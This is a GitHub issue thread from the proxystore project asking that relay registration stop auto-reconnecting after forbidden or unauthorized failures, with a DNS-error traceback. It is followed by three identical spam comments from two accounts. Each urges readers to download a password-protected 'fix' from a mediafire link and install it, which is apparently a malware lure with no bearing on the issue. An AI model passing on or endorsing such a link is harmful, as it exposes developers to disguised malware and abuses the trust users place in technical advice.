### ISSUE TITLE
Avoid relay registration retry for certain registration failures

### ISSUE THREAD

**Issue by gpauloski** [proxystore/proxystore#619]
### Describe the Request

Some relay registration failures are not recoverable from (forbidden and unauthorized) so we should stop the endpoint rather than sitting in the auto-reconnect loop.

Specifically, these two error codes can cause an exit.
https://github.com/proxystore/proxystore/blob/28f76dd8047afd8ba00e4769f3ca3f16fa66f31a/proxystore/p2p/relay/server.py#L334-L343

We can raise certain errors here.
https://github.com/proxystore/proxystore/blob/28f76dd8047afd8ba00e4769f3ca3f16fa66f31a/proxystore/p2p/relay/client.py#L290-L305

It would also be good to catch this kind of exception and log it nicer. (It does get logged because it happens in a background task so nothing crashes, but we can handle it better.)
```[2024-08-13 02:59:49.706] ERROR (proxystore.utils.tasks) :: Traceback (most recent call last):
  File "/home/coordinator/venv/lib/python3.12/site-packages/proxystore/utils/tasks.py", line 32, in _execute_and_log_traceback
    await coro(*args, **kwargs)
  File "/home/coordinator/venv/lib/python3.12/site-packages/proxystore/p2p/relay/client.py", line 226, in _reconnect_on_close
    await self.connect()
  File "/home/coordinator/venv/lib/python3.12/site-packages/proxystore/p2p/relay/client.py", line 279, in connect
    self._websocket = await self._register(
                      ^^^^^^^^^^^^^^^^^^^^^
  File "/home/coordinator/venv/lib/python3.12/site-packages/proxystore/p2p/relay/client.py", line 173, in _register
    websocket = await websockets.client.connect(
                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/coordinator/venv/lib/python3.12/site-packages/websockets/legacy/client.py", line 647, in __await_impl_timeout__
    return await self.__await_impl__()
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/coordinator/venv/lib/python3.12/site-packages/websockets/legacy/client.py", line 651, in __await_impl__
    _transport, _protocol = await self._create_connection()
                            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "uvloop/loop.pyx", line 1978, in create_connection
socket.gaierror: [Errno -3] Temporary failure in name resolution
```

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
